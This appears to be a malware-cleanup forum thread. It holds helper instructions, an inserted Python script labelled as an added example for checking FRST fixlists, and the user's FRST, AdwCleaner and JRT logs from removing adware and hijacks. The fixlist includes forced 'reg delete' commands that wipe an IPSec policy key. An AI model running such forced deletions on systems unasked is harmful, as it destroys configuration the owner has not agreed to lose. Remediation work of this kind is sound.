On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.


~~~~~~~~~~

Download CKScanner by askey127 from HERE (http://downloads.malwareremoval.com/CKScanner.exe)
Important - Save it to your desktop.
Double-click CKScanner.exe and click Search For Files.
After a very short time, when the cursor hourglass disappears, click Save List To File.
A message box will verify the file saved.
Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

~~~~~~~~~~~~~~~~~~~~~~~~~~
Download Malwarebytes' Anti-Malware (http://www.malwarebytes.org/mbam-download.php) TO YOUR DESKTOP




Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"







On the Dashboard click on Update Now

Go to the Settings tab

Under Settings go to Detection and Protection

Under PUP and PUM make sure both are set to show Treat Detections as Malware

Go to Advanced Settings and make sure Automatically Quarantine Detected Items is checked

Then on the Dashboard click on Scan

Make sure to select THREAT SCAN

Then click on Scan


After the restart once you are back at your desktop, open MBAM once more.
Click on the History tab > Application Logs.
Double click on the scan log which shows the Date and time of the scan just performed.
Click 'Copy to Clipboard'
Paste the contents of the clipboard into your reply
~~~~~~~~~~~~~~~~~~~
Please post:
Fixlog.txt
AdwCleaner[CX].txt
JRT.txt
CKFiles.txt
Malwarebytes' Anti-Malware log
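
A pre-flight check for the fixlist step in the post above, as an added example that is not part of the original post and not FRST's own code: it confirms that fixlist.txt is plain text (not WordPad RTF) and sits in the same folder as the FRST executable, then groups the entries by type so they can be reviewed before the fix is run. The `.exe` extension, the function names and the sample fixlist (placeholder paths, GUIDs and host name) are assumptions made for the example.

```python
"""Pre-flight check for an FRST fixlist (added example, not FRST's own code)."""
import re
from collections import Counter
from pathlib import Path

# Constructed sample in the shape of the fixlist above; every path, GUID and
# host name here is a placeholder, not a value from the thread.
SAMPLE_FIXLIST = r"""start
CreateRestorePoint:
CloseProcesses:
BHO-x32: No Name -> {00000000-0000-0000-0000-000000000001} -> No File
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleTask => C:\Program Files (x86)\Example\Signup.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Example\Desktop\Browser.lnk -> C:\Program Files\Example\browser.exe (Example Corp) -> hxxp://search.example.invalid/?type=sc
AlternateDataStreams: C:\Users\Example\.DS_Store:AFP_AfpInfo
C:\Users\Example\AppData\Local\Temp\tmp0000.exe
EmptyTemp:
End
"""

# "Name: rest" or "Name:" alone. A bare path such as C:\Users\... does not
# match, because its colon is followed by a backslash, not whitespace.
DIRECTIVE = re.compile(r"^([A-Za-z][A-Za-z0-9 \-]*?):(?:\s+(.*))?$")
DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")
URL = re.compile(r"\b(?:hxxps?|https?)://\S+", re.IGNORECASE)


def decode(raw):
    """Decode bytes as Notepad may have saved them (UTF-16 or UTF-8 BOM, else UTF-8)."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


def parse_fixlist(text):
    """Split a fixlist into entries: line number, kind, body and any URLs."""
    entries = []
    for number, raw_line in enumerate(text.splitlines(), 1):
        line = raw_line.strip()
        if not line or line.lower() in ("start", "end"):
            continue  # blank lines and the start/End markers carry no entry
        match = DIRECTIVE.match(line)
        if match:
            # Group the 32-bit view ("-x32") with its 64-bit counterpart.
            kind = re.sub(r"-x32$", "", match.group(1))
            body = match.group(2) or ""
        elif DRIVE_PATH.match(line):
            kind, body = "path", line
        else:
            kind, body = "unrecognised", line
        entries.append({"line": number, "kind": kind, "body": body,
                        "urls": URL.findall(line)})
    return entries


def summarize(entries):
    """Count entries per kind."""
    return dict(Counter(entry["kind"] for entry in entries))


def preflight(folder):
    """Return a list of problems; an empty list means the folder looks ready."""
    names = {p.name.lower(): p for p in Path(folder).iterdir() if p.is_file()}
    problems = []
    # Assumption: the tool is saved as FRST*.exe (the post says FRST/FRST64).
    if not any(n.startswith("frst") and n.endswith(".exe") for n in names):
        problems.append("no FRST executable in this folder")
    fixlist = names.get("fixlist.txt")
    if fixlist is None:
        near = sorted(n for n in names if n.startswith("fixlist"))
        hint = f" (found: {', '.join(near)})" if near else ""
        problems.append("fixlist.txt not found" + hint)
        return problems
    raw = fixlist.read_bytes()
    if raw.lstrip().startswith(b"{\\rtf"):
        # WordPad saves Rich Text by default; the content is then markup.
        problems.append("fixlist.txt is RTF, not plain text")
        return problems
    entries = parse_fixlist(decode(raw))
    if not entries:
        problems.append("fixlist.txt has no entries")
    for entry in entries:
        if entry["kind"] == "unrecognised":
            problems.append(f"line {entry['line']}: not a directive or a path")
    return problems


if __name__ == "__main__":
    for kind, count in sorted(summarize(parse_fixlist(SAMPLE_FIXLIST)).items()):
        print(f"{count:3d}  {kind}")
```

Run `preflight()` on the folder that holds the tool (the Desktop in this thread) before pressing Fix.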

kym.preston
2016-03-01, 04:28
Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-01 12:19:19) Run:1
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
EmptyTemp:
End
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
"HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
"HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
"HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
"HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
"HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
"HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
"HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
"HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
"HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
"HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c4e7ab80-82fd-49d4-801d-669cc0a2392a}" => key removed successfully
HKCR\Wow6432Node\CLSID\{c4e7ab80-82fd-49d4-801d-669cc0a2392a} => key not found.
"HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
C:\Users\Kym\IP_Log_Data.js => moved successfully
C:\Users\Kym\Network_Meter_Data.js => moved successfully
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll => moved successfully
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe => moved successfully
"HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
C:\WINDOWS\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Shortcut argument removed successfully.
C:\Users\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
C:\Users\Kym\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========

EmptyTemp: => 4 GB temporary data Removed.


The system needed a reboot.

==== End of Fixlog 12:20:13 ====

# AdwCleaner v5.037 - Logfile created 01/03/2016 at 12:31:36
# Updated 28/02/2016 by Xplode
# Database : 2016-02-28.2 [Server]
# Operating system : Windows 10 Home (x64)
# Username : Kym - KYM-PC
# Running from : C:\Users\Kym\Desktop\AdwCleaner.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\ProgramData\AppVerifier
[-] Folder Deleted : C:\ProgramData\0342bcb1-0de3-0
[-] Folder Deleted : C:\ProgramData\0342bcb1-60e1-0
[-] Folder Deleted : C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
[-] Folder Deleted : C:\ProgramData\3af26a8e-3475-0
[-] Folder Deleted : C:\ProgramData\3af26a8e-45f1-1
[-] Folder Deleted : C:\ProgramData\3c355888
[-] Folder Deleted : C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[-] Folder Deleted : C:\ProgramData\{0b5d3910-112c-1}
[-] Folder Deleted : C:\ProgramData\{21b5474a-312c-0}
[-] Folder Deleted : C:\Users\Kym\AppData\Roaming\EasyFileOpener

***** [ Files ] *****

[-] File Deleted : C:\appverifier.txt
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage-journal
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage-journal
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : {9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}

***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c355888}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
[-] Key Deleted : HKCU\Software\ICSW1.17
[-] Key Deleted : HKCU\Software\powerpack
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\TornTv Downloader
[-] Key Deleted : HKLM\SOFTWARE\mystartsearchSoftware
[-] Key Deleted : HKLM\SOFTWARE\SPPDCOM
[-] Key Deleted : [x64] HKLM\SOFTWARE\AppVerifierService
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\chrome-64-bit.en.softonic.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\chrome-64-bit.en.softonic.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com

***** [ Web browsers ] *****

[-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : booedmolknjekdopkepjjeckmjkdpfgl
[-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : flpcjncodpafbgdpnkljologafpionhb

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [5290 bytes] - [01/03/2016 12:31:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [5161 bytes] - [01/03/2016 12:27:52]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [5436 bytes] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 10 Home x64
Ran by Kym (Administrator) on 01-03-16 at 12:35:19.03
